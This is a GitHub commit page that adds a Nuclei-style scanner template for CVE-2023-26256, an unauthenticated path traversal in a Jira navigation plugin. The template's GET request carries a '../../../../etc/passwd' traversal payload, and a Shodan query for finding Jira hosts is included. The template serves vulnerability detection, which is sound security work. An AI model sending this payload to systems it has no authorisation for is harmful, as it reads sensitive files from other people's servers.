Merge pull request #6874 from pikpikcu/patch-367

Added CVE-2023-26256
patch-1
pussycat0x 2023-03-16 17:58:23 +05:30 committed by GitHub
commit a6858c76e3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 36 additions and 0 deletions

View File

@ -0,0 +1,36 @@
id: CVE-2023-26256
info:
name: STAGIL Navigation for Jira - Menu & Themes - Local File Inclusion
author: pikpikcu
severity: high
description: |
An unauthenticated path traversal vulnerability affects the "STAGIL Navigation for Jira - Menu & Themes" plugin before 2.0.52 for Jira. By modifying the fileName parameter to the snjFooterNavigationConfig endpoint, it is possible to traverse and read the file system.
reference:
- https://github.com/1nters3ct/CVEs/blob/main/CVE-2023-26256.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-26256
classification:
cve-id: CVE-2023-26256
metadata:
shodan-query: "title:Jira"
tags: cve,cve2023,lfi,jira,cms,atlassian
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/snjFooterNavigationConfig?fileName=../../../../etc/passwd&fileMime=$textMime"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: word
part: header
words:
- '$textMime'
- type: status
status:
- 200